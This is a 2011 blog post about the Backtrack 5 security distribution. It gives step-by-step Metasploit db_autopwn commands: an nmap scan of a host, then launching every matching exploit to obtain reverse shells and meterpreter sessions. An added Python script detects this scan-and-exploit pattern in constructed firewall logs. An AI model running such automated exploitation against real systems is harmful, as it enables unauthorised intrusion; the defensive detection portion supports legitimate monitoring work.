Monday, 23 May 2011

Backtrack 5 vs Backtrack 4

Everyone's favourite security distribution has just been updated, with Backtrack 5 (codename Revolution) being released in the last few weeks.

As per usual, Backtrack is offered as an ISO and a VM, which is extremely handy for getting straight into playing around with the new features without any setup requirements.

Backtrack 5 is based on Ubuntu 10.04 LTS and the Linux kernel 2.6.38, and metasploiters will be excited to know that Metasploit 3.7.0 is packaged as part of BT5.

db_autopwn - if noise doesn't concern you...

What is very impressive is how easy it is to use db_autopwn to scan the network, automatically create a MySQL database to export the scan results to, and then run possible exploits against the hosts that are found. Remember, of course, that db_autopwn is VERY loud, so you wouldn't want to use this sort of technique if you know your targets potentially have any IDS/IPS or network monitoring in place, such as SNMP trapping.

For those interested, it is as simple as a couple of easy steps.

1. I like to work via the GNOME interface, so navigate to Metasploit Framework and open the msfconsole.

2. Type: db_driver mysql
This will set the nmap scan to log to MySQL.

3. Type: nmap -v -O 10.101.224.185
This will scan the host and log the results to MySQL.

4. Type: db_autopwn -p -e -b
This will analyze the host and automatically launch all possible exploits found against it. If any of the exploits work you will gain a reverse_tcp shell bound to a random port. If you add -t to your argument list you will get a long list of all the exploits available against the platform, in my case 8113.

5. Type: sessions -l
This will show whether you have any available sessions to use, or to upgrade to the more advanced meterpreter shell.

6. Type: sessions -i <session id> (without the brackets)
This will bind to any active shells listed above.

You can also type sessions -u <session id> to upgrade your shell to a meterpreter shell. Then the fun of hash dumps and sniffing the client's keystrokes can begin, but that's a blog for another day!
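The caveat earlier in the post is worth taking seriously from the other side of the wire: the sequence above (an nmap -O sweep of one host, followed by every applicable exploit being thrown at it) leaves an unmistakable footprint in even a basic firewall log. The script below is an added example, not code from Backtrack or Metasploit, showing how a defender can flag that footprint. It assumes iptables-style syslog lines recording TCP SYNs; the log format, the hosts and the timestamps are all constructed for the example (the target address is the one used in the post), and the thresholds are illustrative, not tuned for any real network.

```python
"""
Flag the noisy db_autopwn pattern in firewall logs: one source touching many
distinct ports on a host inside a short window (the port scan), then hitting
the same few service ports over and over (the exploit barrage).

Added example; not Backtrack or Metasploit code. Log format, addresses and
timestamps below are constructed for illustration.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# iptables-style "SYN" log line, e.g.
# May 23 10:01:00 fw kernel: IN=eth0 OUT= SRC=a DST=b PROTO=TCP SPT=n DPT=m SYN
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} \d{1,2} \d{2}:\d{2}:\d{2}) \S+ kernel: "
    r".*SRC=(?P<src>\S+) DST=(?P<dst>\S+) PROTO=TCP .*?DPT=(?P<dpt>\d+)"
)


def parse_line(line, year=2011):
    """Return (timestamp, src, dst, dst_port) or None for lines we don't handle."""
    m = LINE_RE.search(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["src"], m["dst"], int(m["dpt"])


def detect(lines, window=timedelta(seconds=60), scan_ports=20, repeat_hits=5):
    """Return alerts as (kind, src, dst, detail) tuples for each src->dst pair."""
    events = defaultdict(list)  # (src, dst) -> [(ts, dst_port), ...]
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            ts, src, dst, dpt = parsed
            events[(src, dst)].append((ts, dpt))

    alerts = []
    for (src, dst), evs in events.items():
        evs.sort()
        # Sliding window: most distinct destination ports seen within `window`.
        start, max_ports = 0, 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1
            max_ports = max(max_ports, len({p for _, p in evs[start:end + 1]}))
        if max_ports >= scan_ports:
            alerts.append(("port_scan", src, dst, max_ports))
        # Repeated connections to the same port: exploit modules being retried.
        per_port = defaultdict(int)
        for _, p in evs:
            per_port[p] += 1
        hammered = sorted(p for p, n in per_port.items() if n >= repeat_hits)
        if hammered:
            alerts.append(("exploit_barrage", src, dst, hammered))
    return alerts


def build_sample_log():
    """Constructed log: one host sweeps 50 ports on the post's example target and
    then retries 139/445 a dozen times; a second host makes ordinary web traffic."""
    t0 = datetime(2011, 5, 23, 10, 1, 0)
    attacker, target, benign = "10.101.224.50", "10.101.224.185", "10.101.224.20"
    lines = []

    def hit(ts, src, dst, dpt, spt):
        lines.append(f"{ts.strftime('%b %d %H:%M:%S')} fw kernel: IN=eth0 OUT= "
                     f"SRC={src} DST={dst} PROTO=TCP SPT={spt} DPT={dpt} SYN")

    for i, port in enumerate(range(1, 51)):          # nmap-style sweep, 2 ports/s
        hit(t0 + timedelta(seconds=i // 2), attacker, target, port, 40000 + i)
    for i in range(12):                               # exploit attempts, 3 s apart
        hit(t0 + timedelta(seconds=60 + 3 * i), attacker, target,
            445 if i % 2 else 139, 41000 + i)
    for i in range(6):                                # benign browsing, 1/min
        hit(t0 + timedelta(minutes=i), benign, target, 80 if i % 2 else 443, 50000 + i)
    return lines


if __name__ == "__main__":
    for alert in detect(build_sample_log()):
        print(alert)
```

Against the constructed log the scanner host is reported twice, once for the sweep and once for the repeated hits on 139 and 445, while the browsing host produces nothing. The same two signals are what an IDS/IPS or a SIEM correlation rule keys on, which is why the post's advice to avoid db_autopwn on monitored networks holds.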

I love BT5 and hope to have more chances to use it in production in the future!